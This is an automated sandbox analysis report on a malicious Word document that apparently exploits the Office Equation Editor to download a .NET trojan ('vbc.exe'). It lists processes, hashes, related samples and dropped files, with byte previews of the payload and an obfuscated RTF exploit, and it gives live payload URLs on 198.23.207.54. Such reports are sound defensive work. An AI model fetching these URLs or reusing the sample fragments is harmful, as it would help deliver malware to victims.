Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@16/25@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 85% Number of executed functions: 60 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, svchost.exe
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:36:32	API Interceptor	76x Sleep call for process: EQNEDT32.EXE modified
16:36:36	API Interceptor	77x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.23.207.54	Payment_Advice.docx	Get hash	malicious	Browse	198.23.207.54/450/vbc.exe
198.23.207.54	List.xlsx	Get hash	malicious	Browse	198.23.207.54/90/vbc.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	Universalmiddel169.exe	Get hash	malicious	Browse	107.173.81.61
	Order_Details.xlsx	Get hash	malicious	Browse	198.23.174.121
	quotation docx lnk.lnk	Get hash	malicious	Browse	23.94.191.90
	test_240.doc	Get hash	malicious	Browse	192.3.152.171
	UPDATED SOA.docx	Get hash	malicious	Browse	192.3.13.61
	BANK DETAILS.docx	Get hash	malicious	Browse	192.3.152.171
	BANK DETAILS.docx	Get hash	malicious	Browse	192.3.152.171
	n3gTuiZC2E.exe	Get hash	malicious	Browse	192.227.128.150
	Deed office Document.xlsx	Get hash	malicious	Browse	107.172.76.136
	PROJE S#U0130PAR#U0130#U015e#U0130 2022RFQ 8388292.xlsx	Get hash	malicious	Browse	192.3.152.158
	ATT00001.docx	Get hash	malicious	Browse	107.172.13.146
	Sipari#U015f Metak_WJO-001.docx	Get hash	malicious	Browse	192.210.219.10
	statement of account.exe	Get hash	malicious	Browse	192.3.130.2
	ATT00001.docx	Get hash	malicious	Browse	107.172.13.146
	Automated Slip.xlsx	Get hash	malicious	Browse	198.23.174.121
	documents.xlsx	Get hash	malicious	Browse	192.210.219.10
	Pedido-CR0208022.xlsx	Get hash	malicious	Browse	192.210.219.10
	COASTAL100673744.xlsx	Get hash	malicious	Browse	192.210.219.10
	Sipari#U015f Metak_WJO-001.xlsx	Get hash	malicious	Browse	192.210.219.10
	T58790.xlsx	Get hash	malicious	Browse	192.210.219.10

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Payment_Advice.docx	Get hash	malicious	Browse
	List.xlsx	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	Payment_Advice.docx	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	List.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2832855663751045
Encrypted:	false
SSDEEP:	96:K6LXY7uRttMUpBtjpBtLESXTpBtZypBtZXH:Nk7ubpPpjXTp8pB
MD5:	A42CD2601E8DA8AA1FD892A7397AC7D4
SHA1:	99C922D4F9F52DF874419253753AB0761FEFF1E7
SHA-256:	0A65B4B7E9955419EBC6E55BACB326FFFEF13009BFB1AA8535100468988A6A24
SHA-512:	88E8D6A82525A4F37E35899569BFB4FEE5A504006B91A0ED318E7674BD7E35CB4F9BBC1403C6696476E200A4601B23155484A63EB8BE970589A990CF5A5F494C
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.....m.F.&.&..)YS,...X.F...Fa.q.............................._...L..r"..>..........MC.\|}.C...gE....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{32AF6775-ED8D-404B-A66E-CD25BD6BBD8D}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6736940209945346
Encrypted:	false
SSDEEP:	48:I3SVZ4By/C91XkH6+6y2a1G1T3qZr6VazK/9ufXxV3ooFkILlX9QsSCEHDYIgxeP:KSVCyS0rxo4CcLooGIpKsfuNWFdRd+
MD5:	4B2A742643ECD07FD3FEA17C86AD68C3
SHA1:	2B77E91A26921AF2032E7DBD78462F055743BFF8
SHA-256:	D19AC29FF05B6DCCE47DB1C4EFBF5104B4FBD485C7CCC7F2A7D15CAF058ADB55
SHA-512:	AEDE46D0B8A06675AE24D2E29D25D7980190ECCB84F32CB414390E08C906FEC64AB10B2C9E626B7E921EB9B7ED2D442D3AFAA36B0EFC3818D08079CA7295F40E
Malicious:	false
Preview:	......M.eFy...zoO.b.SE......[.S,...X.F...Fa.q.................................O...6..y@...........u8.WN.xx......S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9080636632397505
Encrypted:	false
SSDEEP:	3:yVlgsRlzPltlWSK7FwPRSlkrT6S87NKNBFhu276:yPblzP1WSKRrlkaS8cm22
MD5:	54DC995D34811BE34DF0A6FEFC9989F8
SHA1:	E8F97BA58F62DE2C5572F3E2ABC2C6588AF1F721
SHA-256:	31FDA6ADC644BAADF0709391D39E6DE9427C687C575F80785BFDCE8496E55EF3
SHA-512:	2774BA2A0AC2F2B8B7520336C6C153852E59A5C03F9FB3CC7BA7D11FC71D03307D4E6E9BF574F05B2BB523B5F8E80866DDA178818A3917E8855287919FD88FF5
Malicious:	false
Preview:	..H..@....b..q....]F.S.D.-.{.3.2.A.F.6.7.7.5.-.E.D.8.D.-.4.0.4.B.-.A.6.6.E.-.C.D.2.5.B.D.6.B.B.D.8.D.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28930591671030925
Encrypted:	false
SSDEEP:	96:K8BLjmB/ShrbpKQt3rTLHrGb+zUGFGBH:dB/mpSRbpKQtbTje+zUGFG9
MD5:	8C5A6A537AF0DB10105C7D6CCB14CE76
SHA1:	708C68737A40D7D7A12CA911F789E0F17C2C6047
SHA-256:	38A00895C843714697429ADB60951558C6CE3858995C3626E0F587BFD6634ED2
SHA-512:	D6FCE56B8A80EACFB9E234A52A079958990E0D7348B03235977516BFEB524255BE089F38BCA4817FB4C562E33BC436E9FA5C3084D7E0FCD8C472B59406BE1161
Malicious:	false
Preview:	......M.eFy...zM.. .])C...4...S,...X.F...Fa.q............................<.p..=.D.T'..............v.\|.K......B.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{F4637C4C-84C5-48D5-B5F6-DBF781800F91}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22111882937479274
Encrypted:	false
SSDEEP:	24:I3FRLwnM0B34YewnRNp2BXCd+5P1dZJku8xNv4O5I+M9XUo2lj5IEO4leUuLn1vF:I3PUrB7Zy0+Vnrb8xVd580ljHTPZc
MD5:	3BB95E9B516C7605FBAACF38FD216332
SHA1:	CA7872E1593B24162BAA2A1D2CF21B3ACCD52483
SHA-256:	6CE4A065EDDB6873079694C34BD749C630C6064203CD3CEB651DB83ADD42F982
SHA-512:	93C1822EEDFDF5621B575CB955E69C619605FE8BF0AF6284AEFD45740643B8724EE7DEB070752CBC9E9950BD3E742C19A5A98FE4690FCE82EE54C0733718D0B5
Malicious:	false
Preview:	......M.eFy...z].{.;.F.. ..2..S,...X.F...Fa.q...................................J.\|;4................._L..&.0...P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9057420623056247
Encrypted:	false
SSDEEP:	3:yVlgsRlzVmSrSFDSNKgK7pYRjIHOFVBlYR5l276:yPblzwSrSxSgV7pYRsuFTCt22
MD5:	DFFF21B5710A4BE77F70A759385FBF5C
SHA1:	B5AF5FCFFC37411A86438557302C7F70C6B9EBCE
SHA-256:	967D6380AE7C13D64C58A8E7D6CAD39F5F03B63BD8717027E739C316DC31E1F9
SHA-512:	3821DB4185D22C38C503B39869C1EA739508E3498B0DE6298FE529167219D577B9B9722C750DB2CD610B9CB1235C1A42690ABE01B3677C3A9632E5460978D760
Malicious:	false
Preview:	..H..@....b..q....]F.S.D.-.{.F.4.6.3.7.C.4.C.-.8.4.C.5.-.4.8.D.5.-.B.5.F.6.-.D.B.F.7.8.1.8.0.0.F.9.1.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	839680
Entropy (8bit):	7.820966123278669
Encrypted:	false
SSDEEP:	24576:k81ENl0PsO9ZzPhSB4v3gtfC7PRqEzwFRaQS:Til0PsO99PhuU3WfC7PR3zwFD
MD5:	DD7507C4B13050E9A433A7BD70F7591F
SHA1:	7706C0E624EEFC87602805F449E4AF20893DBC00
SHA-256:	676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
SHA-512:	DDBAB3F63DA65808F1A2F8DEF5EE453320F61C390A2530BD4B33275CCC6788234D6FB2DAB737ADDCC340D42A71B6DE5E5EB59491F8C06D8348DF089F5FB5A537
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 31%, Browse Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: Payment_Advice.docx, Detection: malicious, Browse Filename: List.xlsx, Detection: malicious, Browse
IE Cache URL:	http://198.23.207.54/200/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._]................0.................. ........@.. .......................@............@.................................H...O............................ ......,................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................\|.......H.......p\...X......7...4....0..........................................^..}.....(.......(......0......................9......{....o....o....s.......{....o....o.....+].o....t..............o.....o....o....o.........(........,...........o ......+.........o!......o"...-....u........,...o#......{....o$....o%...o&...&..........:.i........0..2.........{....o'...o.....0..+..{....o'....o(...o)....+.....0..:..........1...{....o$...o.....+....,...{....o$....o+....o,.....*...0......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	downloaded
Size (bytes):	24597
Entropy (8bit):	4.909148857109057
Encrypted:	false
SSDEEP:	384:rmq0Zr0J58AREmC9EywMtA+LLlSMDXPonNgzOjcJWXdXSO8ltpQ9I:KxKE/EywMtA+LpSwoCzEMpQ9I
MD5:	B804BDE22CFA7A9A0E6EAD73F025305F
SHA1:	1601954798A3BE82B2832944E7049F8C4CBB76FA
SHA-256:	4F52BC5A6093AAACB63B758B980E03C021699264574C2B9966242DCE79CD0A99
SHA-512:	4BA4E0C2934092F14F6E25B5CD45EDDDB666D149F237D8FB1AC7CAFFB8BE3024214A16A214B5EEC56BB3ABA8AFFF34B25FD82C652E46039C3422DC24B601D6E8
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
IE Cache URL:	http://198.23.207.54/shp/doc_200.doc
Preview:	{\rtF6132[4[@4]?%7_!?'1418`?5[5!<2'-`0??.'.&.62?`!4%4.0#:=%0..>98.-==/67'%538?1\|_?5:.]?+?`!`-`-.-?@!.?.).<?20?2<?.),<$5/`@6;;\|[+5+2\|`$<!??>!@%!=?1.')16$8')_4^)`_@)5,)~(+6$,9.?1-)'7+<)..+,.+@^8&1#@%#%8&$.)502;2=4?%]'<)>^40<#7]1%1?)7%&.3.%\|:@1&.75`.?%_#^7~..6<)&.9.%,#0+'':%1#1\|<0>7`&:#.?\|#;0>^]-=8?-?.@.9'-.$,%<9:?.?]^^,[,?2]90.#7.5!1.\|5^%+->.3$:!)4.>3?!~2?6.:`=~'(?7@#;,9_%;-.?;>0??0/8\|=..>\|@?[.0:;?7%:_9\|?.79=#1.~7\|##\|$?0:)%.!(?7[&[>=?=14^^+.?$/\|'+.><.[;+$93.$.@?[.7-#2.=~4$+.'`<%)':)~<[(?`2:98#.&37=?~>~@,..9.`-,;,>34.@@?@-$?~4[.2>+~$_?]28?@@]8?\|%$?=?6$&?3-.,?;#/+?&@[54?2((0%!?$7.<!=&:^&43>?1?.%,5.#?!!.#4>%.9.%%:;.$]_8+)'9/#?[`0]/7+.<\|#'6')./9$!2!%-##.$$,?.].?,+8+4;~?$^-+'5$['8:.%8>=#%~./8._#4/;.?&#3$]..%~~`0(?%3'3??$?<@3@?],~`.?#3(-@^`~(~?.\|#4\|?=94.8/?5~8/$-??]<9_?&~(%./?-.@6?)-?$2,?9['>?~)%3!%?$?+~9~.6?.(!%]:$19_`][?'6;3?2\|<,\|/8.^)9??+8??>1~?>.~?[\|.#1?%?#55(:4_$??%7@.[6#)_2[9>5(?\|[~:.?,.?#)>,5~)?`?>@.%#35.1)[/23:,$?%@_`?%^\|`^.$5@.[72=\|]_&.=!+%:5!$]7[8.#??<#!%2%2<??9_4+;

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\125384CE.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	579088
Entropy (8bit):	2.276153789836189
Encrypted:	false
SSDEEP:	1536:RQt5Ag7/5CNvDUyP+05BgE8YE27f6cPtG7Mc/izMjVv:eFxcg90wv
MD5:	AF2FC7CAB2E80CA0635D24ED790AB24F
SHA1:	41B8259358C8A3E2C82673D3DAF7365FE34A5392
SHA-256:	553BA4B398E93A053242A685A54FBA75C1AD445AB128723BC6E84EF875C4FDDD
SHA-512:	BDDA57590886577129A43B9A107B8A489F84A7ECD5D688E8488CB1C2024D3F1C87684136A67DB9BE0B01FCB2AF5ECEBF51424FA8CE6736A47D459EFF058FBE0A
Malicious:	false
Preview:	....l............................V..'f.. EMF............................@.......K........................(..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............s...................!..............?...........?................................L...d...................................!..............?........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C4AC313.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 731 x 704, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	14442
Entropy (8bit):	7.887985838389699
Encrypted:	false
SSDEEP:	384:MDQoY6/Y/gQYZ8NwQxg9He3ov4RU/d0PPG1:joV/Y/gQYCNwQ6eK4RU6PP0
MD5:	898C1F73F97CECCE45FDF7E1C1DFC6B1
SHA1:	0F438F3D74E29A4859D9993887FC83B2DFB054F8
SHA-256:	911DDF76DAFCAC9A0E827AE82CC3475F6E6D199B0D7921D67ACF4CE9B13619AD
SHA-512:	6540C64D2BB7F9E5E189F3B7FDE2F664D07C5BC406D5080A042F4C9FBD29B98EE6CB51629BD2C1D5904897A525E9B470E4C66E3DD428E1B00D83EFC2527E90C1
Malicious:	false
Preview:	.PNG........IHDR.............u.N.....gAMA......a.....sRGB.........PLTE.......{...........-.......ppp.........V01x..=....`...x..._{..7..U..b......U0,....O.z..5......{....p..7..0.U..a..7.a..7....Z.......v4..4f..ev-._..8..\|..6...j>.....^..xW-2Tl..f...f.................z\..6`....\.j.. .IDATx..{o........H...zM948:Q....>..t.......{.~.j(u.ZR.....y{.z....z....(J...%t.....Id.....K.:?i.5.8{Ag...`......!..l_]F.%..6..m......!.../..6..!.lC.. ..A`.z../....i.V..;.w4...K.._].p_.@..v._.9.g....SY.Z.k.a.y.............K...~c`..r@_u...&:a.~...mN\.\.jn.........]...i...n.so..e\|..3.}6..+kw.......kO....G$.R'W...(...j..v...\|.....,2wg....K..........(..l.....#.N.P.?...j....~...;ko`.................9..g&VY#m....f.b..j~.]dc.........-...4..n..../G:..Ruu....Q...Nc..F...........n.....\|l.^....57.o..yV]....v..x...f.F6c..(..8...3{x..j)-]].#.@Z.....C.>wCP...!.....'5[.....kW...p%..N..1.....w.`...s.~'Bb}.e.u..w.[.;"GZ..qM.&4.5..[o.>x.2...S..oY......D.........-y.F..~#1By

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67C004A6.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 731 x 704, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	14442
Entropy (8bit):	7.887985838389699
Encrypted:	false
SSDEEP:	384:MDQoY6/Y/gQYZ8NwQxg9He3ov4RU/d0PPG1:joV/Y/gQYCNwQ6eK4RU6PP0
MD5:	898C1F73F97CECCE45FDF7E1C1DFC6B1
SHA1:	0F438F3D74E29A4859D9993887FC83B2DFB054F8
SHA-256:	911DDF76DAFCAC9A0E827AE82CC3475F6E6D199B0D7921D67ACF4CE9B13619AD
SHA-512:	6540C64D2BB7F9E5E189F3B7FDE2F664D07C5BC406D5080A042F4C9FBD29B98EE6CB51629BD2C1D5904897A525E9B470E4C66E3DD428E1B00D83EFC2527E90C1
Malicious:	false
Preview:	.PNG........IHDR.............u.N.....gAMA......a.....sRGB.........PLTE.......{...........-.......ppp.........V01x..=....`...x..._{..7..U..b......U0,....O.z..5......{....p..7..0.U..a..7.a..7....Z.......v4..4f..ev-._..8..\|..6...j>.....^..xW-2Tl..f...f.................z\..6`....\.j.. .IDATx..{o........H...zM948:Q....>..t.......{.~.j(u.ZR.....y{.z....z....(J...%t.....Id.....K.:?i.5.8{Ag...`......!..l_]F.%..6..m......!.../..6..!.lC.. ..A`.z../....i.V..;.w4...K.._].p_.@..v._.9.g....SY.Z.k.a.y.............K...~c`..r@_u...&:a.~...mN\.\.jn.........]...i...n.so..e\|..3.}6..+kw.......kO....G$.R'W...(...j..v...\|.....,2wg....K..........(..l.....#.N.P.?...j....~...;ko`.................9..g&VY#m....f.b..j~.]dc.........-...4..n..../G:..Ruu....Q...Nc..F...........n.....\|l.^....57.o..yV]....v..x...f.F6c..(..8...3{x..j)-]].#.@Z.....C.>wCP...!.....'5[.....kW...p%..N..1.....w.`...s.~'Bb}.e.u..w.[.;"GZ..qM.&4.5..[o.>x.2...S..oY......D.........-y.F..~#1By

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	24597
Entropy (8bit):	4.909148857109057
Encrypted:	false
SSDEEP:	384:rmq0Zr0J58AREmC9EywMtA+LLlSMDXPonNgzOjcJWXdXSO8ltpQ9I:KxKE/EywMtA+LpSwoCzEMpQ9I
MD5:	B804BDE22CFA7A9A0E6EAD73F025305F
SHA1:	1601954798A3BE82B2832944E7049F8C4CBB76FA
SHA-256:	4F52BC5A6093AAACB63B758B980E03C021699264574C2B9966242DCE79CD0A99
SHA-512:	4BA4E0C2934092F14F6E25B5CD45EDDDB666D149F237D8FB1AC7CAFFB8BE3024214A16A214B5EEC56BB3ABA8AFFF34B25FD82C652E46039C3422DC24B601D6E8
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtF6132[4[@4]?%7_!?'1418`?5[5!<2'-`0??.'.&.62?`!4%4.0#:=%0..>98.-==/67'%538?1\|_?5:.]?+?`!`-`-.-?@!.?.).<?20?2<?.),<$5/`@6;;\|[+5+2\|`$<!??>!@%!=?1.')16$8')_4^)`_@)5,)~(+6$,9.?1-)'7+<)..+,.+@^8&1#@%#%8&$.)502;2=4?%]'<)>^40<#7]1%1?)7%&.3.%\|:@1&.75`.?%_#^7~..6<)&.9.%,#0+'':%1#1\|<0>7`&:#.?\|#;0>^]-=8?-?.@.9'-.$,%<9:?.?]^^,[,?2]90.#7.5!1.\|5^%+->.3$:!)4.>3?!~2?6.:`=~'(?7@#;,9_%;-.?;>0??0/8\|=..>\|@?[.0:;?7%:_9\|?.79=#1.~7\|##\|$?0:)%.!(?7[&[>=?=14^^+.?$/\|'+.><.[;+$93.$.@?[.7-#2.=~4$+.'`<%)':)~<[(?`2:98#.&37=?~>~@,..9.`-,;,>34.@@?@-$?~4[.2>+~$_?]28?@@]8?\|%$?=?6$&?3-.,?;#/+?&@[54?2((0%!?$7.<!=&:^&43>?1?.%,5.#?!!.#4>%.9.%%:;.$]_8+)'9/#?[`0]/7+.<\|#'6')./9$!2!%-##.$$,?.].?,+8+4;~?$^-+'5$['8:.%8>=#%~./8._#4/;.?&#3$]..%~~`0(?%3'3??$?<@3@?],~`.?#3(-@^`~(~?.\|#4\|?=94.8/?5~8/$-??]<9_?&~(%./?-.@6?)-?$2,?9['>?~)%3!%?$?+~9~.6?.(!%]:$19_`][?'6;3?2\|<,\|/8.^)9??+8??>1~?>.~?[\|.#1?%?#55(:4_$??%7@.[6#)_2[9>5(?\|[~:.?,.?#)>,5~)?`?>@.%#35.1)[/23:,$?%@_`?%^\|`^.$5@.[72=\|]_&.=!+%:5!$]7[8.#??<#!%2%2<??9_4+;

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	76288
Entropy (8bit):	7.165422826184264
Encrypted:	false
SSDEEP:	1536:siwPJULtG5CNvDUyPfF9IPJULtG5CNvDUyPfF9:6iCcgMyiCcgM
MD5:	14540D163FB5AA4C3B52D8060F16D72E
SHA1:	924C8F8D1C6B03E6C50C8C9722FB0A1AB6C65468
SHA-256:	51DD8D9E740AE38D462D725BA36D695FCA036CCFEAAF2282F96DB3ECF049E4EF
SHA-512:	60109D6CFAD6B1D4CEE861496532D4299CBAEB876865C2BC99429D745B8E39F754560CACE9A7543D6C133B4AB07305D667E693E884D644097624BDA01F17599C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>.......................................................I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................F........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E.......G...H...........K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88266991-B66B-4B67-A090-087BD104DE9E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.5732579521453803
Encrypted:	false
SSDEEP:	3:Gg7NYtl6K6DlK/lllYdltn/ldl/dRAY/lzNQwtwwxmnlqPxZlhQtChJn:3pk65K/G37SwJmn4PxZUtgn
MD5:	3E80BE894DFD5A8C093E1F1044C0B614
SHA1:	6B05EA4669CF710A23D04C6960CF8B883D855D4E
SHA-256:	B617F8F259126CA62ADB0442EB5C2AB2853FA5E58CD64B88918FDF708D0CA8D5
SHA-512:	896394E6C6B9685C17D18EFBEDBF4C4204635DE69F5373D99724CFB5B4E1403D6077CD36E55F791722C35ACF95EE50B6074C90DA219F8BA2BC5E7332B06A3895
Malicious:	false
Preview:	....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8E9606C5-2F7B-41CF-A346-056DD4AB9308}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15058
Entropy (8bit):	3.6592058590821335
Encrypted:	false
SSDEEP:	384:Bc/ROhQwfCiN0qiCJFG/G3NgudYgAdOTF+e:BmOCJwbJgGpdY3YTF+e
MD5:	5B919E8A2FE7341FAE0181ABD88E3A86
SHA1:	4001E256B7640363E84B5E86503789A12C4F5645
SHA-256:	11385DB7DD35CEA8877FE115D5D26C6FA421DE86662BCEB87C4E4D566E5D5E46
SHA-512:	3BBCFB7BAA7FFD4C881BE1F1EBE12B8A0FA0B8E1A5B45C0DED8AF0EC3BAE8B9B483A3A1A71313C52B9BBABA3F1849DAE598651423FB8FD517705F46F910467E3
Malicious:	false
Preview:	[.4.[.@.4.].?.%.7._.!.?.'.1.4.1.8.`.?.5.[.5.!.<.2.'.-.`.0.?.?...'...&...6.2.?.`.!.4.%.4...0.#.:.=.%.0.....>.9.8...-.=.=./.6.7.'.%.5.3..8.?.1.\|._.?.5.:...].?.+.?.`.!.`.-.`.-...-.?.@.!...?...)...<.?.2.0.?.2.<.?...).,.<.$.5./.`.@.6.;.;.\|.[.+.5.+.2.\|.`.$.<.!.?.?.>.!.@.%.!.=.?.1...'.).1.6.$.8.'.)._.4.^.).`._.@.)..5.,.).~.(.+.6.$.,.9...?.1.-.).'.7.+.<.).....+.,...+.@.^.8.&.1.#.@.%.#.%.8.&.$...).5.0.2.;.2.=.4.?.%.].'.<.).>.^.4.0.<.#..7.].1.%.1.?.).7.%.&...3...%.\|.:.@.1.&...7.5.`...?.%.._.#.^.7.~.....6.<.).&...9...%.,..#.0.+.'.'.:.%.1.#.1.\|.<.0.>.7.`.&.:.#...?.\|.#.;.0.>.^.].-.=.8.?..-.?...@...9.'.-...$.,.%.<.9.:.?...?.].^.^.,.[.,.?.2..].9.0...#.7...5.!.1...\|.5.^.%.+.-.>...3.$.:.!.).4...>.3.?.!.~.2.?.6...:.`.=.~.'.(.?.7.@.#.;.,.9._.%.;.-...?.;.>.0.?.?.0./.8.\|.=.....>.\|.@.?.[...0.:.;.?.7.%..:._.9.\|.?....7.9.=.#.1....~.7.\|.#.#.\|.$.?.0.:.).%...!.(.?.7.[.&.[.>.=.?.=.1.4.^.^.+...?.$./.\|.'.+...>.<...[.;.+.$.9.3...$...@.?.[...7.-.#.2...=.~.4.$.+...'.`.<.%.).'.:.).~.<.[.(.?.`.2.:.9.8.#...&.3.

